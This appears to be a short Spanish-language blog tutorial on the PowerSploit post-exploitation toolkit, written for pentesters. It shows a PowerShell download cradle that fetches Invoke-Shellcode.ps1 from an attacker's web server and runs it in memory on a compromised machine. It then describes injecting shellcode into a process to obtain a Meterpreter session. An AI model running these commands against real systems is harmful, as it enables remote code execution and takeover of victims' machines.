PowerSploit - Una herramienta para nuestro arsenal - BoomerNiX

miércoles, 9 de enero de 2019

PowerSploit - Una herramienta para nuestro arsenal

En esta ocasión vengo a hablar de PowerSploit. Se trata de una colección de utilidades que van a ser de gran interés para nuestros pentests. Cuenta con muchos módulos con distintos fines: ejecución de código, modificación de sripts, persistencia, exfiltración, bypass de antivirus, elevación de privilegios, etc.

El objetivo en este post es hacer un ejemplo de esta herramienta, para que así puedas profundizar más con ella. Voy a hacer uso de Kali Linux, que ya cuenta con esta magnífica herramienta (te la puedes descargar del enlace al GitHub puesto arriba), abrimos una terminal y nos movemos a la siguiente ruta > /usr/share/powersploit. Ahí podemos ver como se dividen los distintos módulos con ls:

PowerSploit_Kali-Linux

Voy a poner en marcha un servidor web, donde copiaremos el contenido. Aquí haré uso de Apache, pero podéis usar otra opción rápida como Python…

Apache_PowerSploit-1

Dentro de un navegador se puede comprobar el contenido del servidor, podemos ver todo el contenido que listamos anteriormente usando ls.

Apache_PowerSploit

Ahora vamos a ver cómo se puede hacer uso, partimos de que ya tenemos el control de una máquina víctima.

Para poder ejecutar un código de la herramienta, hacemos uso del siguiente comando:

IEX(New-Object Net.WebClient).DownloadString("http://192.168.42.128/ps/script-path ")

Aquí no se va a explicar los comandos, quédate con la idea de que nos descargamos el script y se ejecuta en memoria. Puedes revisar la siguiente página de Microsoft.

Vemos aquí que indicamos la dirección IP de nuestro servidor, y el directorio donde se encuentra el script, por ejemplo, si queremos descargar el script: Invoke-Shellcode.ps1, ejecutamos:

IEX(New-Object Net.WebClient).DownloadString("http://192.168.42.128/ps/CodeExecution/Invoke-Shellcode.ps1")

Y para obtener el prompt: Invoke-Shellcode


Invoke-Shellcode_PowerSploit

Vemos que podemos inyectarlo sin PID (se inyecta en el proceso de PowerShell), si no en el proceso que indiquemos, en este caso internet explorer. Para la prueba no he indicado ningún payload (-Payload), ¿y qué pasa? se abre la calculadora, sin más. Pero podemos abrir una terminal con destino a otro equipo remoto, o mejor, darnos un meterpreter :D. Dejo un par de capturas (primero se pone a la escucha el handler con el payload y luego se ejecuta el código que se ve en la PowerShell):

PowerSploit_Incoke-Shellcode_Payload

Metasploit-Handler

Una herramienta muy conocida y muy recomendable tenerla en nuestro arsenal, nos vemos en las próximas entradas. Saludos.

1 comentario:

  1. Excelente y muy de acuerdo con la idea de tenerno dentro del arsenal

    ResponderEliminar